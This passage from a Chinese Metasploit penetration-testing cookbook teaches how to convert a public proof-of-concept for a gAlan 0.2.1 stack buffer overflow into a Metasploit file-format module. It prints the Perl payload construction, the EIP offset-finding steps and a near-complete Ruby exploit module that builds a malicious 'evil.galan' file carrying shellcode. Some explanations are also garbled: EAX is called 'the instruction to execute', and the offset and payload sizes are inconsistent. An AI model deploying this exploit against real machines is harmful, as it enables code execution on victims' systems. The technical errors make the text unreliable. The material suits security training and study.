8.5 将漏洞利用代码转换为Metasploit模块
Metasploit渗透测试手册
在前面的内容中已介绍了如何使用漏洞利用代码模块来攻陷目标机器。在本节中,我们将进一步拓展模块使用体验,尝试使用可用的概念验证代码开发完整的漏洞利用代码模块。为了将任意新的漏洞利用代码转换为框架中的模块,并在Metasploit团队进行更新之前使用其进行渗透测试,必须掌握将漏洞利用代码转换为模块的相关知识。并且,每个漏洞利用代码都以框架中模块形式存在也是不可能的,所以,下面学习怎样使用可用的POC来构建自己的漏洞利用代码模块。
准备
首先,选择可以转换为模块的任意漏洞利用代码,这里选的是gAlan Zero day漏洞利用代码,可以从http://www.exploit-db.com/exploits/10339处下载。
gAlan是一款用于 X Windows 和Win32的音频处理工具(在线和离线方式都支持),用户可利用该工具以模块化的形式构建合成器、声效链、混音器、序列器、drum-machines等,而这些操作只需要将代表音频处理元件的图标进行链接等操作即可完成。
只有当目标机器使用这一应用程序并且攻击者预先已知道时,针对gAlan的漏洞利用代码才能发挥作用,因此,攻击者需要预先知道目标机器上安装了哪些应用程序。
怎样实现
在开始漏洞利用代码转换之前,有必要了解关于栈溢出攻击的一些知识。
在软件中,调用栈时如果使用了过大的内存可能会发生栈溢出,这里调用栈是指应用软件的运行时栈,其中包含了有限大小的内存,通常是在程序启动时就已经确定的。调用栈的大小取决于很多因素,包括程序设计语言、机器体系结构、多线程及可用内存总量等。当程序试图使用的内存空间大于调用栈中实际可用的内存空间时,就会发生栈溢出,一般情况下会导致程序崩溃。在漏洞利用过程中,实质上最常被攻击的寄存器是ESP、EIP和EAX。
ESP:指向栈顶。
EIP:指向下一指令地址。
EAX:要被执行的指令。
由于在栈内所有寄存器都是线性存储的,所以需要知道EIP寄存器的确切大小,以便对其进行溢出后可以控制EAX,并执行攻击载荷。
拥有某个漏洞的概念验证代码之后,下一步收集该漏洞尽可能多的信息。观察下面漏洞的概念验证代码,前面少数几行由存储在$shellcode变量中的shellcode组成,可利用msfpayload或msfvenom工具,使用框架中任何可用的攻击载荷生成。
$magic = "Mjik";
$addr = 0x7E429353; # JMP ESP @ user32,dll
$filename = "bof.galan";
$retaddr = pack('l', $addr);
$payload = $magic . $retaddr x 258 . "\x90" x 256 . $shellcode;
漏洞利用代码的主体部分首先包括$magic,其中包含一个四字节的字符串;然后是$addr 变量,其中包含ESP栈指针的位置;之后的$filename变量包含了后渗透阶段将要创建的文件名称;$retaddr包含了返回地址,栈指针指向这一地址,并导致溢出发生后漏洞利用代码的执行;最后是攻击载荷执行语句,负责漏洞利用和shellcode的执行。
从漏洞利用代码可知,此处的shellcode最大可达700字节,攻击载荷的总长度是1214字节,在构建模块时会用到这些信息。
我们可以使用重复的返回地址,也可以根据EIP被重写时的大小来确定返回地址。Metasploit中包含一个有用的pattern_create.rb工具,可以辅助发现EIP被重写时的确切地址,该工具可生成特定模式的字符串,并传递给漏洞利用代码,可以发现该字符串存储于EIP中。下面使用该工具创建一个5000字符的字符串。
root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb
Usage: pattern_create.rb length [set a] [set b] [set c]
root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb 5000
编辑漏洞利用代码脚本,使用另一个测试变量$junk替代$payload,并将刚生成的5000字符的字符串复制到该变量中。这里假设读者具备逆向工程和应用程序调试的基础知识。假设存储在EIP中的字符串模式为“234abc”,现在使用另一个名为pattern_offset.rb的Metasploit工具计算其在字符串中出现的位置。
position where this pattern exists in the string we passed:
root@bt:/pentest/exploits/framework3/tools# ./pattern_offset.rb 0x234abc
5000
1032
因此,为获取EIP准确位置,必须要传递的字节数是1032。
现在,我们已经收集到了关于漏洞利用代码的充分信息,做好了将其转换为Metasploit 模块的准备。
怎样工作
下面开始构建自己的模块,脚本中的第一行代码表示导入依赖库,并创建父类,然后定义initialize()函数,其中包含该漏洞利用代码和注册选项等信息。
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info, 'Name' => 'gAlan 0.2.1 Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack overflow in gAlan 0.2.1
By creating a specially crafted galan file, an attacker may be able
to execute arbitrary code. },
'License' => MSF_LICENSE,
'Author' => [ 'original by Jeremy Brown' ],
'Version' => '$Revision: 7724 $',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/10339' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20\x0c\x0b\x09",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Universal', { 'Ret' => 0x100175D0} ],
# 0x100175D0 call esi @ glib-1_3
],
'Privileged' => false,
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'evil.galan']),
], self.class)
end
目前的代码都很简单,比较复杂的代码是从exploit()函数开始的,下面介绍其实现的过程。
首先从原始漏洞利用脚本的头4个字节开始,即$magic = "Mjik"。
在本模块中,该代码被sploit = "Mjik"替代。
然后构建缓冲区,由于前面已经确定了EIP被重写的位置,因此可以使用如下语句替换重复的返回地址。
sploit << rand_text_alpha_upper(1028);
sploit << [target.ret].pack('V');
添加nop slide,该漏洞利用脚本中对应部分在本模块中更改为如下形式。
sploit << "\x90" * 45
接下来构建完整的shellcode。
sploit << payload.encoded
最后,将这些行脚本代码整合到exploit()函数中。
def exploit
sploit = "Mjik"
sploit << rand_text_alpha_upper(1028)
sploit << [target.ret].pack('V')
sploit << "\x90" * 45
sploit << payload.encoded
galan = sploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(galan)
end
上面是将现有漏洞利用代码转换为Metasploit模块的一个简单的示例,这一过程的难度主要依赖于漏洞利用代码本身。关于模块转换,最好的学习途径是利用Metasploit库中的可用漏洞利用代码模块,下一节将学习怎样将漏洞利用代码模块移植到Metasploit框架以便进行渗透测试。
本文仅用于学习和交流目的,不代表异步社区观点。非商业转载请注明作译者、出处,并保留本文的原始链接。